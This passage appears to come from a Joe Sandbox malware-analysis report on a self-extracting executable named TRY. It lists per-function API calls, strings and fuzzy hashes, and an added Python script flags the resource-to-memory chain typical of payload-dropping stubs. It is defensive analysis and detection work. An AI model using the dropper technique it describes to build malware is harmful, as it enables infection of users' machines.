                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                    • String ID:
                                                                    • API String ID: 1084409-0
                                                                    • Opcode ID: d49133d5c2195b87ebe0def94a96092c9cfef79a36c4b08e02082d86901b1f76
                                                                    • Instruction ID: b517bf3a8ef1818dc37bd9838a17487e3245d99881001af7f13cbd8a37a20891
                                                                    • Opcode Fuzzy Hash: d49133d5c2195b87ebe0def94a96092c9cfef79a36c4b08e02082d86901b1f76
                                                                    • Instruction Fuzzy Hash: 3B114FB1A14640C2E720CF56E8443A5E7A0F788BB8F54423DD959476ECCF78C657CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$AttributesFile$DialogFindFreeIndirectLoadParam
                                                                    • String ID:
                                                                    • API String ID: 2018477427-0
                                                                    • Opcode ID: 243369eae741d19aacabb87601a44f38098308e578327846539de662b5f04598
                                                                    • Instruction ID: 3ef2cb37b17a6c51cd900b120b04390abeb1efaddf3c25d31c830697b3079c67
                                                                    • Opcode Fuzzy Hash: 243369eae741d19aacabb87601a44f38098308e578327846539de662b5f04598
                                                                    • Instruction Fuzzy Hash: F41129B1E14A4086FB545F24E9487E5A691E3453B8F24413DEA48067EDCB7E8B878240
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle
                                                                    • String ID:
                                                                    • API String ID: 2962429428-0
                                                                    • Opcode ID: e2199ce9ef1e50f94450445b336f8eb1f800428b427470215b6e51b7e546b616
                                                                    • Instruction ID: d7d31cca3416287176df282aa83bb5dd229f859630670a7dfb952f3c7fad152b
                                                                    • Opcode Fuzzy Hash: e2199ce9ef1e50f94450445b336f8eb1f800428b427470215b6e51b7e546b616
                                                                    • Instruction Fuzzy Hash: 8DF05EB2A14681D3EB1C4F26F6813E8B2A0E748B68F10423DDA27476CCCBB8C592C710
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                    • String ID: $EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$tha
                                                                    • API String ID: 3100096412-3380029818
                                                                    • Opcode ID: 99a5b2a0ec1b945be53423b18da261cd1a6f7f9ebb90be66510584ff9c7f5bf8
                                                                    • Instruction ID: cbb91bb52e11c9852e641c07b8d102910fc98208085a42ec8f86f57553cc8ea9
                                                                    • Opcode Fuzzy Hash: 99a5b2a0ec1b945be53423b18da261cd1a6f7f9ebb90be66510584ff9c7f5bf8
                                                                    • Instruction Fuzzy Hash: F581ACF1F1464182FB609B25E9507EAE690B7997B9F10003ED98A46AEDDB7CC747CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
                                                                    • String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$tha
                                                                    • API String ID: 3530494346-2429308302
                                                                    • Opcode ID: b32232c71f02db9eac751eaa73e0219094b90672794be299764bd12c1609fe4c
                                                                    • Instruction ID: c0e692bfaac61c54a79fd825985789427394629413dbd8dac46edc7734f85d69
                                                                    • Opcode Fuzzy Hash: b32232c71f02db9eac751eaa73e0219094b90672794be299764bd12c1609fe4c
                                                                    • Instruction Fuzzy Hash: 4E619FF1E0468086FBA09B22E9547EAE691A785BB4F18453DCA4647BDDCF3CC7478710
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                    • String ID:
                                                                    • API String ID: 2168512254-0
                                                                    • Opcode ID: 97142c8180b182c09d7e65f73d61bf3d69a57c2ebd7ef9200e0a5b9acfa85d0c
                                                                    • Instruction ID: b3cc1326364e70b5cab66a8656950577a5ad0fa55d2bbfd5ec2e66805118332d
                                                                    • Opcode Fuzzy Hash: 97142c8180b182c09d7e65f73d61bf3d69a57c2ebd7ef9200e0a5b9acfa85d0c
                                                                    • Instruction Fuzzy Hash: 9A5150B2A006408AEB20DF21E4947DDB3A4F748BA8F51513DEA4D93B5CDF39C646CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 2829607268-3733053543
                                                                    • Opcode ID: 755c1f95413603282cdaf0838d41edb21c135bbbd8bb097cb716c8789541b3cb
                                                                    • Instruction ID: e0184e93c3bad98bd53ddd28c51e667ab7906baa323c921cb8e1938539b3e16d
                                                                    • Opcode Fuzzy Hash: 755c1f95413603282cdaf0838d41edb21c135bbbd8bb097cb716c8789541b3cb
                                                                    • Instruction Fuzzy Hash: 142165F2A2464182F7608B60F4597EBF360F798B69F20503DE64A46A5CDF7CC2468B00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 4104442557-0
                                                                    • Opcode ID: 4f2a0639155c5e925320fcd736b091fdafd92ce9187d839ac1d0c4f5e4d7b07b
                                                                    • Instruction ID: 4fdd18b5eeb022a658e0a1c354d79474eaa87e1d5f3756465266594eb97066e5
                                                                    • Opcode Fuzzy Hash: 4f2a0639155c5e925320fcd736b091fdafd92ce9187d839ac1d0c4f5e4d7b07b
                                                                    • Instruction Fuzzy Hash: D3112C76B01B408AEB10DF71E854399B3A4F70976CF401A39EA6D47B58EF78C6A5C340
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                    • String ID: "$:$@$RegServer
                                                                    • API String ID: 1203814774-4077547207
                                                                    • Opcode ID: 12dbcaa9ab24823adec4c851043693544301958f98602ebb2d68d5c9481071a5
                                                                    • Instruction ID: c0a82efb8a462b0a62833d012072c6be307b537c06430c5b354146ddaba80233
                                                                    • Opcode Fuzzy Hash: 12dbcaa9ab24823adec4c851043693544301958f98602ebb2d68d5c9481071a5
                                                                    • Instruction Fuzzy Hash: 2102F4F2F0468481FE648B28D4543E9EBA3A7557B4F58063DD99A0EADDCA39CB07C704
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                    • String ID: $tha
                                                                    • API String ID: 2654313074-3973746845
                                                                    • Opcode ID: b3c2b2ef615d35578e8726eb57ba44340733395281d979963716657eb2164978
                                                                    • Instruction ID: 622da078ea5c4a9309699713eef5db0884d42ade5a7e89be44fbabb1218ebca0
                                                                    • Opcode Fuzzy Hash: b3c2b2ef615d35578e8726eb57ba44340733395281d979963716657eb2164978
                                                                    • Instruction Fuzzy Hash: C8418BF1E04A4082FB249B25E9447E9E3A1A784BB5F18423ED91A47BECCF3D8647C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                    • API String ID: 1865808269-1731843650
                                                                    • Opcode ID: 736fc19ecd43b7d2575f89e8e3507fd18e5a39b1beba44f6e218ac1590884990
                                                                    • Instruction ID: c4a6c7f3508d432dce1797c5f35629f49cfcd8398f0424e26b3ac270ba3cdfbb
                                                                    • Opcode Fuzzy Hash: 736fc19ecd43b7d2575f89e8e3507fd18e5a39b1beba44f6e218ac1590884990
                                                                    • Instruction Fuzzy Hash: 014157F5A05B8085FB519B11F85079AF7A0F749BA5F844539DE8A07B98DF3CC64AC700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                    • String ID: p}'$tha
                                                                    • API String ID: 3785188418-1583393498
                                                                    • Opcode ID: 27b069c42d7cb845fa97ce8d939dda9c2cba10eeb794f59d18c4f9ea67e0c096
                                                                    • Instruction ID: 9f35cf4f56527674ce44bcf8f41bb74c3b2ae8de18e4af1e3cd3e9cad12d879c
                                                                    • Opcode Fuzzy Hash: 27b069c42d7cb845fa97ce8d939dda9c2cba10eeb794f59d18c4f9ea67e0c096
                                                                    • Instruction Fuzzy Hash: 5A210BF4E0064186FA649B65E8183E4E361A78AB75F58933DC82A463ECDF3D874BC710
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                    • String ID: rce.$tha
                                                                    • API String ID: 2929476258-4244134132
                                                                    • Opcode ID: 8031d0f5c260d1828ae3b026181698a0ded8a6d20b8c433cb7d87d6f329fc285
                                                                    • Instruction ID: 1f5426d682e87fe3b3cac81c8b5ea8df8b2a283d9281fd370440f9a7b27e1c93
                                                                    • Opcode Fuzzy Hash: 8031d0f5c260d1828ae3b026181698a0ded8a6d20b8c433cb7d87d6f329fc285
                                                                    • Instruction Fuzzy Hash: 9351AFB2E15B8486FB519B25E8047E9E790A758BB4F041239DE5917BDDEE38CB83C700
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                    • API String ID: 2659952014-2428544900
                                                                    • Opcode ID: 8b8c07e85b9783fddf8189e616ff50c24e5f390df1e20b01a64ea08d369b5e4a
                                                                    • Instruction ID: 25d6a73587cf75c8eaf8a6bc9fc7ea353b7834243b3c3a8c13b8c2e66b3e31a4
                                                                    • Opcode Fuzzy Hash: 8b8c07e85b9783fddf8189e616ff50c24e5f390df1e20b01a64ea08d369b5e4a
                                                                    • Instruction Fuzzy Hash: 724171B271468086FF209F15E8643DAE7A1F785BA4F545039EA8A07B9CDF3CC646CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                      • Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64CE8
                                                                      • Part of subcall function 000000013FB64CC0: SizeofResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64CF3
                                                                      • Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64D13
                                                                      • Part of subcall function 000000013FB64CC0: LoadResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D1E
                                                                      • Part of subcall function 000000013FB64CC0: LockResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D27
                                                                      • Part of subcall function 000000013FB64CC0: memcpy_s.MSVCRT ref: 000000013FB64D40
                                                                      • Part of subcall function 000000013FB64CC0: FreeResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D49
                                                                    • LocalAlloc.KERNEL32(?,?,?,?,?,000000013FB62E75), ref: 000000013FB63D2D
                                                                    • GetLastError.KERNEL32 ref: 000000013FB63D5D
                                                                    • LocalFree.KERNEL32 ref: 000000013FB63DB9
                                                                      • Part of subcall function 000000013FB64A70: LoadStringA.USER32 ref: 000000013FB64B04
                                                                      • Part of subcall function 000000013FB64A70: MessageBoxA.USER32 ref: 000000013FB64B3E
                                                                    • lstrcmpA.KERNEL32(?,?,?,?,?,000000013FB62E75), ref: 000000013FB63DD9
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,000000013FB62E75), ref: 000000013FB63E2E
                                                                      • Part of subcall function 000000013FB67304: FindResourceA.KERNEL32 ref: 000000013FB6732E
                                                                      • Part of subcall function 000000013FB67304: LoadResource.KERNEL32 ref: 000000013FB6733F
                                                                      • Part of subcall function 000000013FB67304: DialogBoxIndirectParamA.USER32 ref: 000000013FB6736F
                                                                      • Part of subcall function 000000013FB67304: FreeResource.KERNEL32 ref: 000000013FB6737B
                                                                    • LocalFree.KERNEL32 ref: 000000013FB63E0D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945787480.000000013FB6C000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000009.00000002.945792399.000000013FB6E000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_13fb60000_TRY.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                    • String ID: <None>$LICENSE$p}'
                                                                    • API String ID: 2414642746-2429390302
                                                                    • Opcode ID: 5a4247ff5b5a3f3e33d9449045396edb7047108b95579c67965ad8371a5c0a11
                                                                    • Instruction ID: 590051502711443b60b0728a337d3b2265ad5a9192b85080fb5eb6f1b8b49d28
                                                                    • Opcode Fuzzy Hash: 5a4247ff5b5a3f3e33d9449045396edb7047108b95579c67965ad8371a5c0a11
                                                                    • Instruction Fuzzy Hash: 48314FF2E1560183F7209F61E8657E6F2A0F7887A8F14413DD94A46AA8DF7DC607CB14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
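
The API trace above is the one place in this section where the report shows an ordered call sequence rather than a summary: inside subcall 000000013FB64CC0 the function locates a resource (FindResourceA, SizeofResource), maps it (LoadResource), takes a pointer (LockResource) and copies the bytes out (memcpy_s) before FreeResource, while a sibling subcall (000000013FB67304) loads a resource only to feed DialogBoxIndirectParamA. Together with the "UPDFILE%lu" string carried by a later Resource/FindLoadLock function on this page, that is the shape of a stub that stores its payload in PE resources, which fits the "Drops PE files" and "PE file contains executable resources" signatures in the overview. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses entries in this page's text layout into records, indexes them by API String ID so they can be pivoted across reports, and flags a scope whose ordered API sequence resolves a resource and copies it out. The sample text is constructed from entries on this page; the chain heuristic, the COPY_APIS set and the stripping of A/W suffixes are the editor's assumptions.

```python
# Added example: parse Joe Sandbox per-function code-analysis entries and
# flag resource-to-memory extraction chains. Heuristic is the editor's.
import re

# Constructed sample: two function entries in the report's text layout.
SAMPLE = """
APIs
• Part of subcall function 000000013FB64CC0: FindResourceA.KERNEL32 ref: 000000013FB64CE8
• Part of subcall function 000000013FB64CC0: SizeofResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64CF3
• Part of subcall function 000000013FB64CC0: LoadResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D1E
• Part of subcall function 000000013FB64CC0: LockResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D27
• Part of subcall function 000000013FB64CC0: memcpy_s.MSVCRT ref: 000000013FB64D40
• Part of subcall function 000000013FB64CC0: FreeResource.KERNEL32(?,?,00000000,000000013FB62BB3), ref: 000000013FB64D49
• LocalAlloc.KERNEL32(?,?,?,?,?,000000013FB62E75), ref: 000000013FB63D2D
• lstrcmpA.KERNEL32(?,?,?,?,?,000000013FB62E75), ref: 000000013FB63DD9
• Part of subcall function 000000013FB67304: FindResourceA.KERNEL32 ref: 000000013FB6732E
• Part of subcall function 000000013FB67304: LoadResource.KERNEL32 ref: 000000013FB6733F
• Part of subcall function 000000013FB67304: DialogBoxIndirectParamA.USER32 ref: 000000013FB6736F
• Part of subcall function 000000013FB67304: FreeResource.KERNEL32 ref: 000000013FB6737B
Similarity
• API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
• String ID: <None>$LICENSE$p}'
• API String ID: 2414642746-2429390302
• Opcode ID: 5a4247ff5b5a3f3e33d9449045396edb7047108b95579c67965ad8371a5c0a11
APIs
Similarity
• API ID: FreeLibrary$AddressAllocateInitializeLoadProc
• String ID: CheckTokenMembership$advapi32.dll
• API String ID: 4204503880-1888249752
• Opcode ID: 64d96d54a73524583d87b63dfc7e8286ae492dfacb74392b1afb45792a249c94
"""

# "Part of subcall function <addr>: " prefix is optional; args in parentheses are optional.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\([^)]*\),)? ref: (?P<ref>[0-9A-F]+)$")
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+?): ?(?P<val>.*)$")
LIST_FIELDS = {"API ID": "api_id", "String ID": "string_id"}  # '$'-separated in the report


def parse_entries(text):
    """One dict per function; 'calls' holds (api, module, ref, subcall-or-None) in report order."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":  # every function entry opens with this heading
            cur = {"calls": [], "api_id": [], "string_id": [], "api_string_id": (0, 0), "opcode_id": ""}
            entries.append(cur)
            continue
        if cur is None or not line:
            continue
        m = API_RE.match(line)
        if m:
            cur["calls"].append((m["api"], m["mod"], m["ref"], m["sub"]))
            continue
        f = FIELD_RE.match(line)
        if not f:
            continue
        key, val = f["key"], f["val"].strip()
        if key in LIST_FIELDS:
            cur[LIST_FIELDS[key]] = [s for s in val.split("$") if s]
        elif key == "API String ID":  # two decimal numbers joined by '-'
            cur["api_string_id"] = tuple(int(x) for x in val.split("-"))
        elif key == "Opcode ID":
            cur["opcode_id"] = val
    return entries


# Assumed set of "copy the bytes out" APIs; extend for the samples you see.
COPY_APIS = {"memcpy_s", "memcpy", "RtlMoveMemory", "WriteFile"}
# Ordered shape of a stub that stores its payload in PE resources:
# locate the resource, map it, take a pointer, copy it somewhere else.
CHAIN = (lambda a: a == "FindResource", lambda a: a == "LoadResource",
         lambda a: a == "LockResource", lambda a: a in COPY_APIS)


def _base(api):
    """Drop the ANSI/Unicode suffix so FindResourceA and FindResourceW compare equal."""
    return re.sub(r"(?<=[a-z])[AW]$", "", api)


def resource_extraction_chains(entry):
    """Scopes ('self' or a subcall address) whose API sequence matches CHAIN in order;
    unrelated calls in between are allowed, missing steps are not."""
    by_scope = {}
    for api, _mod, _ref, sub in entry["calls"]:
        by_scope.setdefault(sub or "self", []).append(_base(api))
    hits = []
    for scope, apis in by_scope.items():
        step = 0
        for a in apis:
            if step < len(CHAIN) and CHAIN[step](a):
                step += 1
        if step == len(CHAIN):
            hits.append(scope)
    return hits


def index_by_api_string_id(entries):
    """Pivot key for cross-report matching: same API set and strings, possibly a different Opcode ID."""
    return {e["api_string_id"]: e["opcode_id"] for e in entries}


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(e["opcode_id"][:16], e["string_id"], resource_extraction_chains(e))
```

Only the 000000013FB64CC0 scope is flagged; the dialog-loading subcall resolves and maps a resource too but never locks and copies it, which is why the check insists on order and on all four steps. Pivoting on API String ID rather than Opcode ID is useful when a recompiled build keeps the same imports and strings.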

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.945776654.000000013FB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 000000013FB60000, based on PE: true
                                                                    • Associated: 00000009.00000002.945772284.000000013FB60000.00000002.00000001.01000000.00000005.sdmp
